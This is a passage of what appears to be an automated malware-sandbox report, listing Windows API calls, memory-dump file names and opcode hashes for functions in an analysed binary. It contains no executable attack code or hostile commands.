                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B1663
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B16A7
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B16C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 95cfaf087a18c91996a086a27179f9c1adfd4621fb6960258079098e9f417ea8
                                                          • Instruction ID: 43a2bb1fd1cfb0e95256ec243b246e2c8eff6a44f19955ec4236bec98af9e207
                                                          • Opcode Fuzzy Hash: 95cfaf087a18c91996a086a27179f9c1adfd4621fb6960258079098e9f417ea8
                                                          • Instruction Fuzzy Hash: 23512AA05647D23DFB368B24CC65BFABFAD5B05380F4C8489E1D5464C2C694ECB4E750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 6759a4237406c424f21d0cbb433cd4cefc2f5b590f559e5561e6b5ea345dbebe
                                                          • Instruction ID: fd87b03b334b339f9b01339e878069157616cf73767d04645d97be6aa357d5b5
                                                          • Opcode Fuzzy Hash: 6759a4237406c424f21d0cbb433cd4cefc2f5b590f559e5561e6b5ea345dbebe
                                                          • Instruction Fuzzy Hash: 24417F65C3062876CB11FBB4C84AACFB7B9AF04310F508956E909E3121E734A6698BA5
                                                          APIs
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3B8A,?), ref: 002B4BE0
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3B8A,?), ref: 002B4BF9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 002B3BAA
                                                          • _wcscmp.LIBCMT ref: 002B3BC6
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B3BDE
                                                          • _wcscat.LIBCMT ref: 002B3C26
                                                          • SHFileOperationW.SHELL32(?), ref: 002B3C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: d9b5ee3fa8eae0cf66bfddbdaeae2bda2db8fcb2452ee384c4cd87fb8b32f4a0
                                                          • Instruction ID: 36ab22eaf63fe0e57bd4626c91cda79591912eb4bc6f26696270be3516120025
                                                          • Opcode Fuzzy Hash: d9b5ee3fa8eae0cf66bfddbdaeae2bda2db8fcb2452ee384c4cd87fb8b32f4a0
                                                          • Instruction Fuzzy Hash: F2417E7151C3459AC752EF64D485AEBB7ECAF88380F50096EF489C3192EB34D698CB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 002D78CF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7976
                                                          • IsMenu.USER32(?), ref: 002D798E
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D79D6
                                                          • DrawMenuBar.USER32 ref: 002D79E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: af77181c3527dc4584e11f6bf85cd518cb6f8c7aa2aa63cfe7ab32f704fadb5c
                                                          • Instruction ID: 25e59e9247d19593e1145cd5d37db2c7dc73da1c0010b5c73b3b8c29a4adb14b
                                                          • Opcode Fuzzy Hash: af77181c3527dc4584e11f6bf85cd518cb6f8c7aa2aa63cfe7ab32f704fadb5c
                                                          • Instruction Fuzzy Hash: 9F417C72A14249EFDB10CF54D894EEABBF9FB09310F04816AE9459B390D774AD60CF90
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D1631
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D165B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 002D1712
                                                            • Part of subcall function 002D1602: RegCloseKey.ADVAPI32(?), ref: 002D1678
                                                            • Part of subcall function 002D1602: FreeLibrary.KERNEL32(?), ref: 002D16CA
                                                            • Part of subcall function 002D1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D16ED
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 002D16B5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: 0b946afce9cee87d82ffea9a5ac517b73d4b1c7c99f298c2b32049b7e18ce554
                                                          • Instruction ID: 68bc27968daad8b55649f22677f20905df33deea5e04febdd43ec2336b0715e2
                                                          • Opcode Fuzzy Hash: 0b946afce9cee87d82ffea9a5ac517b73d4b1c7c99f298c2b32049b7e18ce554
                                                          • Instruction Fuzzy Hash: C3313071910109BFEB14DF90DCC9EFEB7BCEF08301F14016AE505A6650D7749E959BA0
                                                          APIs
                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002D6911
                                                          • GetWindowLongW.USER32(016F5700,000000F0), ref: 002D6944
                                                          • GetWindowLongW.USER32(016F5700,000000F0), ref: 002D6979
                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002D69AB
                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002D69D5
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D69E6
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D6A00
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 43ab3a994c4bf020e18055768e9c26724a4fce74a9b6b78c4061b34268eee209
                                                          • Instruction ID: de1ab71658e489c6e8c9aa26b212ed396d74698cf6cb0c0371d168744c40951a
                                                          • Opcode Fuzzy Hash: 43ab3a994c4bf020e18055768e9c26724a4fce74a9b6b78c4061b34268eee209
                                                          • Instruction Fuzzy Hash: F1311430654192AFDB21CF18DCD9FA537E9EB4A710F1841A5F5148F2B1CB71ACA0DB50
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE2CA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE2F0
                                                          • SysAllocString.OLEAUT32(00000000), ref: 002AE2F3
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE311
                                                          • SysFreeString.OLEAUT32(?), ref: 002AE31A
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 002AE33F
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE34D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 91283580663ef9bca96a62e4e19a77b1727a73f309a3607fe6a7bf25098384a8
                                                          • Instruction ID: 5b42d7b1f3984a7720d80faec0bd1567bc84fe9f6830a5cb491e2f5fa3e75380
                                                          • Opcode Fuzzy Hash: 91283580663ef9bca96a62e4e19a77b1727a73f309a3607fe6a7bf25098384a8
                                                          • Instruction Fuzzy Hash: A9219776615219BF9F10DFA8DCC8CBB77ACEB09360B058165FE18DB250DA70AC968760
                                                          APIs
                                                            • Part of subcall function 002C8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C68B1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C68C0
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C68F9
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 002C6902
                                                          • WSAGetLastError.WSOCK32 ref: 002C690C
                                                          • closesocket.WSOCK32(00000000), ref: 002C6935
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C694E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 82d0fa9fec75281941796bc1831d5aea1eb9e310b07c6b6dd2a127b4c2be1799
                                                          • Instruction ID: c3604696eca3eb407c095dea83784a66f5f53e7e74d51eebfd0f0a7bb0e42f94
                                                          • Opcode Fuzzy Hash: 82d0fa9fec75281941796bc1831d5aea1eb9e310b07c6b6dd2a127b4c2be1799
                                                          • Instruction Fuzzy Hash: 4531C471220104AFDB10AF64DCC9FB977B9EB44725F04422DFD05AB291CBB0AC558FA1
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE3A5
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002AE3CB
                                                          • SysAllocString.OLEAUT32(00000000), ref: 002AE3CE
                                                          • SysAllocString.OLEAUT32 ref: 002AE3EF
                                                          • SysFreeString.OLEAUT32 ref: 002AE3F8
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 002AE412
                                                          • SysAllocString.OLEAUT32(?), ref: 002AE420
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 5fcfaed9faf62da4f090b3756fd66ada84f05fd071e3afc4d7acb474d4222446
                                                          • Instruction ID: bd1b44d52239bd5af769164a60fe607d2b9e25498b3f15c4ef756d1b5459f012
                                                          • Opcode Fuzzy Hash: 5fcfaed9faf62da4f090b3756fd66ada84f05fd071e3afc4d7acb474d4222446
                                                          • Instruction Fuzzy Hash: 14218835614105AF9F109FA8DCC8CBE77ECEB0D360B058165F915CB2A0DA70EC928B74
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D7C57
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D7C64
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D7C6F
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D7C7E
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D7C8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: f3b1107c9fd22d06a36aa9cd4ab4768f774c0cce5f6ae5fa0518f47838fdabf0
                                                          • Instruction ID: cb93bb048b0aa5d45dddc16e587f8b89ddb01a16eae674886f4b957b06d6a0d6
                                                          • Opcode Fuzzy Hash: f3b1107c9fd22d06a36aa9cd4ab4768f774c0cce5f6ae5fa0518f47838fdabf0
                                                          • Instruction Fuzzy Hash: C71186B116021DBEEF159F60CC85EE77F5DEF08758F014116BA08A6190D7759C21DBA4
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00279D16
                                                            • Part of subcall function 002733B7: EncodePointer.KERNEL32(00000000), ref: 002733BA
                                                            • Part of subcall function 002733B7: __initp_misc_winsig.LIBCMT ref: 002733D5
                                                            • Part of subcall function 002733B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0027A0D0
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0027A0E4
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0027A0F7
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0027A10A
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0027A11D
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0027A130
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0027A143
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0027A156
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0027A169
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0027A17C
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0027A18F
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0027A1A2
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0027A1B5
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0027A1C8
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0027A1DB
                                                            • Part of subcall function 002733B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0027A1EE
                                                          • __mtinitlocks.LIBCMT ref: 00279D1B
                                                          • __mtterm.LIBCMT ref: 00279D24
                                                            • Part of subcall function 00279D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00279D29,00277EFD,0030CD38,00000014), ref: 00279E86
                                                            • Part of subcall function 00279D8C: _free.LIBCMT ref: 00279E8D
                                                            • Part of subcall function 00279D8C: DeleteCriticalSection.KERNEL32(0R1,?,?,00279D29,00277EFD,0030CD38,00000014), ref: 00279EAF
                                                          • __calloc_crt.LIBCMT ref: 00279D49
                                                          • __initptd.LIBCMT ref: 00279D6B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00279D72
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: f66df32ac283941a311e315e87c05f9f4a475bf9a03c89b1b20c400dbf722754
                                                          • Instruction ID: 152aab06d3b2675e24e7c7c2ec22e6a7d32396d45afdee4fc509c3f1eb81cb1e
                                                          • Opcode Fuzzy Hash: f66df32ac283941a311e315e87c05f9f4a475bf9a03c89b1b20c400dbf722754
                                                          • Instruction Fuzzy Hash: A1F0903257A7125AEB357B74BC07A8A26D4DF42B30F20C61AF45CDA0D3EF7088E14991
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00274282,?), ref: 002741D3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 002741DA
                                                          • EncodePointer.KERNEL32(00000000), ref: 002741E6
                                                          • DecodePointer.KERNEL32(00000001,00274282,?), ref: 00274203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: eb2166227b1c1c0a8d523b2bab705cc1cbf030a7731841e9a69fe22338d17fc3
                                                          • Instruction ID: 43407dfa786b29b7142b81031e90e5bbf33f298f8d535919bb76c1f5d6b69b16
                                                          • Opcode Fuzzy Hash: eb2166227b1c1c0a8d523b2bab705cc1cbf030a7731841e9a69fe22338d17fc3
                                                          • Instruction Fuzzy Hash: ACE0ED705E0781BFDF126F71EC8DB983668A755706F908464B905D90A0CBF540958A00
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002741A8), ref: 002742A8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 002742AF
                                                          • EncodePointer.KERNEL32(00000000), ref: 002742BA
                                                          • DecodePointer.KERNEL32(002741A8), ref: 002742D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: eab3e08b7780806b1f45e0a49a0e2010ec0ccd2af3fcacbf236c88d4bcf9aab0
                                                          • Instruction ID: 034990c92f2dd5291cb32ae2e0dd4f3c4560e0dff416f44309149d5636431d0b
                                                          • Opcode Fuzzy Hash: eab3e08b7780806b1f45e0a49a0e2010ec0ccd2af3fcacbf236c88d4bcf9aab0
                                                          • Instruction Fuzzy Hash: 28E0B6705E1741FBDF139F61BD8DB843AA8F788B02F508169F505DA0A0CBF446B5CA10
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 002521B8
                                                          • GetWindowRect.USER32(?,?), ref: 002521F9
                                                          • ScreenToClient.USER32(?,?), ref: 00252221
                                                          • GetClientRect.USER32(?,?), ref: 00252350
                                                          • GetWindowRect.USER32(?,?), ref: 00252369
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 89ac3608caa11f65fa58754f3081ec39d1fc42b2f6c86313ff5ab4d2d5e234b8
                                                          • Instruction ID: f7d6078960d1075f23486f858e201bafc8e21d3c5ad2fa52386b63f773aa827d
                                                          • Opcode Fuzzy Hash: 89ac3608caa11f65fa58754f3081ec39d1fc42b2f6c86313ff5ab4d2d5e234b8
                                                          • Instruction Fuzzy Hash: ADB18F3992024ADBDF10CFA8C4807EDB7B1FF09311F148169ED59EB294DB74A968CB58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
